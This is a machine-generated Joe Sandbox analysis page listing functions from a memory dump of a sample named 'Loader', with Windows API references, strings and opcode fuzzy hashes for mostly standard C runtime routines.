Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9e87ed44fbbcd90b877f5f5d3177b3d0a28913016d4914acc8c6844203721a72
Instruction ID: fb23a1b7123063497a4275b4f809554402059c0f3821f1cb24ae9015ed5cedc3
Opcode Fuzzy Hash: 9e87ed44fbbcd90b877f5f5d3177b3d0a28913016d4914acc8c6844203721a72
Instruction Fuzzy Hash: 5001F775944759EFCB118F81CC44FAE7BF8FB04B15F010229F821B66D0EB749904CA84

Function 00ECC516 Relevance: 7.7, APIs: 5, Instructions: 197COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 00ECC59B
__alloca_probe_16.LIBCMT ref: 00ECC664
__freea.LIBCMT ref: 00ECC6CB

Part of subcall function 00ECAD61: HeapAlloc.KERNEL32(00000000,?,?,?,00EBB9E5,?,?,00EB35D2,00001000,?,00EB351A), ref: 00ECAD93

__freea.LIBCMT ref: 00ECC6DE
__freea.LIBCMT ref: 00ECC6EB

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: f17b8ca1f20bbee67a2d884f3d1adf0a63310729b33c278218310ccb29a62a9a
Instruction ID: 58374e164c93de57a2ce3a2ae43384e3de61594ccfd646972c88838af7bf094d
Opcode Fuzzy Hash: f17b8ca1f20bbee67a2d884f3d1adf0a63310729b33c278218310ccb29a62a9a
Instruction Fuzzy Hash: FA51A3725002066FEB219F64CE81FFB7AA9EF44B18B25252DFD09F6241E772DC528660

Function 00EB1860 Relevance: 7.7, APIs: 5, Instructions: 162COMMON

Download Yara Rule

APIs

GetFileSize.KERNEL32 ref: 00EB1912
CloseHandle.KERNEL32 ref: 00EB192E

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: CloseFileHandleSize
String ID:
API String ID: 3849164406-0
Opcode ID: 48966860b6e0484ab44c6916f27074d11c65ec5b41ee75758d6d9d06b69e993c
Instruction ID: f60a6dfef45cca3a45d4dcb6ffcf7d20f63dc491b343636dde45050403ba8def
Opcode Fuzzy Hash: 48966860b6e0484ab44c6916f27074d11c65ec5b41ee75758d6d9d06b69e993c
Instruction Fuzzy Hash: 1071A0B0D04248CFCB00EFA8D59879EBBF0BF48314F508969E499AB380D734A949CF52

Function 00EBE8E7 Relevance: 7.6, APIs: 5, Instructions: 116threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00EBE8FB
AcquireSRWLockExclusive.KERNEL32(?,?,00000000,00EDB3C8,000000FF,?,00EBB697), ref: 00EBE91A
AcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EDB3C8,000000FF,?,00EBB697), ref: 00EBE948
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EDB3C8,000000FF,?,00EBB697), ref: 00EBE9A3
TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,00000000,00EDB3C8,000000FF,?,00EBB697), ref: 00EBE9BA

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: AcquireExclusiveLock$CurrentThread
String ID:
API String ID: 66001078-0
Opcode ID: 5bda0e5023b3f282bf23db342ab91110c51283bf1de8449fecee63a83819132b
Instruction ID: 6d2462ac76463f36a52cf0af08e895471ab0ed49af2f45fef8bd554bab05c032
Opcode Fuzzy Hash: 5bda0e5023b3f282bf23db342ab91110c51283bf1de8449fecee63a83819132b
Instruction Fuzzy Hash: 4F414971900606DFCB64DF65C485AEBB3F8FF84354B105AAAE456B7780E730E988CB51

Function 00EBC054 Relevance: 7.5, APIs: 5, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00EBC05B
std::_Lockit::_Lockit.LIBCPMT ref: 00EBC066
std::_Lockit::~_Lockit.LIBCPMT ref: 00EBC0D4

Part of subcall function 00EBBF5D: std::locale::_Locimp::_Locimp.LIBCPMT ref: 00EBBF75

std::locale::_Setgloballocale.LIBCPMT ref: 00EBC081
_Yarn.LIBCPMT ref: 00EBC097

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 1088826258-0
Opcode ID: a4af997e549c1b7ac84a952a3ee35d2e3e4843aab609f5702c78430070f47891
Instruction ID: 9fad3bdbc61f59105ef7e97142ffbc6e59297cc44b6c37ebe1763dbf341ecaca
Opcode Fuzzy Hash: a4af997e549c1b7ac84a952a3ee35d2e3e4843aab609f5702c78430070f47891
Instruction Fuzzy Hash: DF019A75A046598BC706EB208886ABE7BA1FB85710B152009F8167B391CF74AE46CBC1

Function 00ECF766 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 191COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00ECAFB3: GetLastError.KERNEL32(00000000,?,00ECD392,?,?,?,00000000), ref: 00ECAFB7
Part of subcall function 00ECAFB3: SetLastError.KERNEL32(00000000,?,?,?,00000000,?,FFFFFFFF,000000FF,?,?,?,00000000), ref: 00ECB059

GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00EC509A,?,?,?,00000055,?,-00000050,?,?,?), ref: 00ECF825
IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00EC509A,?,?,?,00000055,?,-00000050,?,?), ref: 00ECF85C

Strings

utf8, xrefs: 00ECF92E
`/, xrefs: 00ECF7D9

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: ErrorLast$CodePageValid
String ID: `/$utf8
API String ID: 943130320-1698776066
Opcode ID: 83014444570d30dd3a8acb30b0336da01e6b726d3532fb49d5f114b1c875a505
Instruction ID: d791320c772c534f32b8addf213ff9f6e737cfd5cb08a05f2da01f7cadd8414d
Opcode Fuzzy Hash: 83014444570d30dd3a8acb30b0336da01e6b726d3532fb49d5f114b1c875a505
Instruction Fuzzy Hash: 85510A72600306BADF28AB70CE42FA677EAEF44704F14253EF555B7181F772E9428651

Function 00ED52C1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00ED535D,00000000,?,00EE8180,?,?,?,00ED5294,00000004,InitializeCriticalSectionEx,00EDF434,00EDF43C), ref: 00ED52CE
GetLastError.KERNEL32(?,00ED535D,00000000,?,00EE8180,?,?,?,00ED5294,00000004,InitializeCriticalSectionEx,00EDF434,00EDF43C,00000000,?,00ECAA0C), ref: 00ED52D8
LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00ED5300

Strings

api-ms-, xrefs: 00ED52E5

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: api-ms-
API String ID: 3177248105-2084034818
Opcode ID: 5159c55787b82f4dd7a63c7f06201c3c5b1b7b3377dd66f7145bbe8c34d3b9d8
Instruction ID: 07cf2920f4e84a5cd71d15411ade68b03aa3a259977ecd5301c1e9e676e32f96
Opcode Fuzzy Hash: 5159c55787b82f4dd7a63c7f06201c3c5b1b7b3377dd66f7145bbe8c34d3b9d8
Instruction Fuzzy Hash: 85E09A71280348BBEB201F62ED06F183E59AB00B85F100030FA0CBC0E4E7A2EC118544

Function 00ED30BF Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(BB40E64E,00000000,00000000,?), ref: 00ED3122

Part of subcall function 00ECAE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ECC6C1,?,00000000,-00000008), ref: 00ECAED2

WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00ED3374
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00ED33BA
GetLastError.KERNEL32 ref: 00ED345D

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
String ID:
API String ID: 2112829910-0
Opcode ID: f859d193acbb99268a32f9cc35bbe16cc2ef5ae9430ac6bdbfe578c013b9a53b
Instruction ID: e5605da403aaa1f64bcebd692ed782be8495c8346b4261a6f5617927a93763f1
Opcode Fuzzy Hash: f859d193acbb99268a32f9cc35bbe16cc2ef5ae9430ac6bdbfe578c013b9a53b
Instruction Fuzzy Hash: 20D19AB5D042489FCB15CFA8D980AEDBBF5FF08314F28416AE426FB351D630AA46CB51

Function 00ECA0E3 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00ECA1AA
___AdjustPointer.LIBCMT ref: 00ECA1CD
___AdjustPointer.LIBCMT ref: 00ECA269

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 5f0246d8c8b917c91456bb95fc5b52891a6b26f3b6e8d785029ef2489141fc68
Instruction ID: 98e42fa7bf54e348b2d36df310f500d156dd7e4a7b09d2bda9e0ea0c8b18a3b2
Opcode Fuzzy Hash: 5f0246d8c8b917c91456bb95fc5b52891a6b26f3b6e8d785029ef2489141fc68
Instruction Fuzzy Hash: 1C51E3B26012199FDB298F50DA41FAA77A4FF00318F1C513DE916672A1E733EC42C751

Function 00ED0B86 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

Part of subcall function 00ECAE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ECC6C1,?,00000000,-00000008), ref: 00ECAED2

GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00ED0BEA
__dosmaperr.LIBCMT ref: 00ED0BF1
GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 00ED0C2B
__dosmaperr.LIBCMT ref: 00ED0C32

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide
String ID:
API String ID: 1913693674-0
Opcode ID: cfb1af9abf0a81a81582b71f09b008e83da38a6e5eb05aacb8f9905f9cd016d5
Instruction ID: 872cdd4b14722949a02105bd62a90f311c79c8025c9faf013bcbc47e9373d248
Opcode Fuzzy Hash: cfb1af9abf0a81a81582b71f09b008e83da38a6e5eb05aacb8f9905f9cd016d5
Instruction Fuzzy Hash: 1321C571604215AF9B20AF61C881FABB7A8FF40368F18562EF959F7351D731EC028790

Function 00EC1652 Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16eb56d2051b5ef92fba980af42d47bd88bb471089b403352cb13279ac3ea34a
Instruction ID: c1aa0a0b40582f965b0bd822bd5e957fbc1bd7a964daa32d38069cd1a88ccdcd
Opcode Fuzzy Hash: 16eb56d2051b5ef92fba980af42d47bd88bb471089b403352cb13279ac3ea34a
Instruction Fuzzy Hash: EB21D7712002056FDB10AF618E81FAB77ADAF4336871455ADF919F7152E732EC128790

Function 00ED1F7C Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 00ED1F84

Part of subcall function 00ECAE71: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00ECC6C1,?,00000000,-00000008), ref: 00ECAED2

FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ED1FBC
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00ED1FDC

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharMultiWide
String ID:
API String ID: 158306478-0
Opcode ID: 568bb48c4ff4f2c81f6c99f30a25124c5850b5f3c3302aa72d7d8e0409376185
Instruction ID: ab2ef57568631bad7ac03f6b2f6cfa4afaa183c2729defa7f0a949b6ccc34f9a
Opcode Fuzzy Hash: 568bb48c4ff4f2c81f6c99f30a25124c5850b5f3c3302aa72d7d8e0409376185
Instruction Fuzzy Hash: 9E11E1B250460D7EA62127B25D89CBF6DADCE593AD715203AF906F6241FA318D02D2B2

Function 00EB2A60 Relevance: 6.1, APIs: 4, Instructions: 53threadCOMMON

Download Yara Rule

APIs

std::_Throw_Cpp_error.LIBCPMT ref: 00EB2A8D
GetCurrentThreadId.KERNEL32 ref: 00EB2A9B
std::_Throw_Cpp_error.LIBCPMT ref: 00EB2AB4
std::_Throw_Cpp_error.LIBCPMT ref: 00EB2AF3

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: Cpp_errorThrow_std::_$CurrentThread
String ID:
API String ID: 2261580123-0
Opcode ID: 21780ca8b90e2ed89f686e32247104afc191ed5d2d2fa8bb3b64a7bc42a15070
Instruction ID: 1595750cefe9c647a65e3d424e080e96f646a044b0a6683ba80cadb26087b18b
Opcode Fuzzy Hash: 21780ca8b90e2ed89f686e32247104afc191ed5d2d2fa8bb3b64a7bc42a15070
Instruction Fuzzy Hash: 6221E2B4E042098FCB08EFA8C5956AEFBF0BF48300F11946DE899AB351D7389941CF51

Function 00EDA470 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00ED9952,00000000,00000001,?,?,?,00ED34B1,?,00000000,00000000), ref: 00EDA487
GetLastError.KERNEL32(?,00ED9952,00000000,00000001,?,?,?,00ED34B1,?,00000000,00000000,?,?,?,00ED2DF7,?), ref: 00EDA493

Part of subcall function 00EDA4E4: CloseHandle.KERNEL32(FFFFFFFE,00EDA4A3,?,00ED9952,00000000,00000001,?,?,?,00ED34B1,?,00000000,00000000,?,?), ref: 00EDA4F4

___initconout.LIBCMT ref: 00EDA4A3

Part of subcall function 00EDA4C5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00EDA461,00ED993F,?,?,00ED34B1,?,00000000,00000000,?), ref: 00EDA4D8

WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00ED9952,00000000,00000001,?,?,?,00ED34B1,?,00000000,00000000,?), ref: 00EDA4B8

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 9747a534bedf4f6d0fa62f3231d84df37174e45cf3080de2803728994b048900
Instruction ID: 6b04e7323492d622e264a5561302be2db0275c228075e978de239f970cd69a97
Opcode Fuzzy Hash: 9747a534bedf4f6d0fa62f3231d84df37174e45cf3080de2803728994b048900
Instruction Fuzzy Hash: B9F03736000559BFCF222F92EC4898D3F66FB453A0B054421FE2DA9270D672CA209B95

Function 00EBEFA7 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 00EBEFB9
GetCurrentThreadId.KERNEL32 ref: 00EBEFC8
GetCurrentProcessId.KERNEL32 ref: 00EBEFD1
QueryPerformanceCounter.KERNEL32(?), ref: 00EBEFDE

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: c943d41eb55bbdd099740aa482ff6ab5d145ae6b00b25e322d8afa725f4b221e
Instruction ID: c5d54e8326a6569928ec6745f661902636bec7c6b875e2a0c649e8d6348f12dc
Opcode Fuzzy Hash: c943d41eb55bbdd099740aa482ff6ab5d145ae6b00b25e322d8afa725f4b221e
Instruction Fuzzy Hash: 51F0B770C0020CEFCB00DFB5C68898EB7F4EF1C200B5149A5A412FB150E730AB44CB50

Function 00EBA4D0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 477COMMON

Download Yara Rule

APIs

_strcspn.LIBCMT ref: 00EBA631
_strcspn.LIBCMT ref: 00EBA65F

Strings

@, xrefs: 00EBA92F

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: _strcspn
String ID: @
API String ID: 3709121408-2766056989
Opcode ID: d445c99962a7485cce21b10e9c92c7a01567271d0dbc05e713175213c29a1725
Instruction ID: d915e88e0e57bc4c7a9e69fe1553126a0f519625c3905322df0f3475e7a47fdc
Opcode Fuzzy Hash: d445c99962a7485cce21b10e9c92c7a01567271d0dbc05e713175213c29a1725
Instruction Fuzzy Hash: 3232C3B49042698FCB24DF64C981ADEFBF5BF48300F0585AAE849A7351D734AE85CF91

Function 00ECA7E0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 122COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00ECA6E1,?,?,00000000,00000000,00000000,?), ref: 00ECA805

Strings

MOC, xrefs: 00ECA817
RCC, xrefs: 00ECA81F

Memory Dump Source

Source File: 00000003.00000002.3409301641.0000000000EB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EB0000, based on PE: true

Associated: 00000003.00000002.3409283960.0000000000EB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409327170.0000000000EDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409345148.0000000000EE6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409361360.0000000000EEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3409376457.0000000000EEC000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_eb0000_Loader.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 72b334d7ba0816f51b5d8d90aea51ce6904bf724261b3fedc0863ec819f6f9ff
Instruction ID: cc740fe4c91df9bc188de9ceae4cc15689b3511dd0d2b9dd0ca25584639dd141
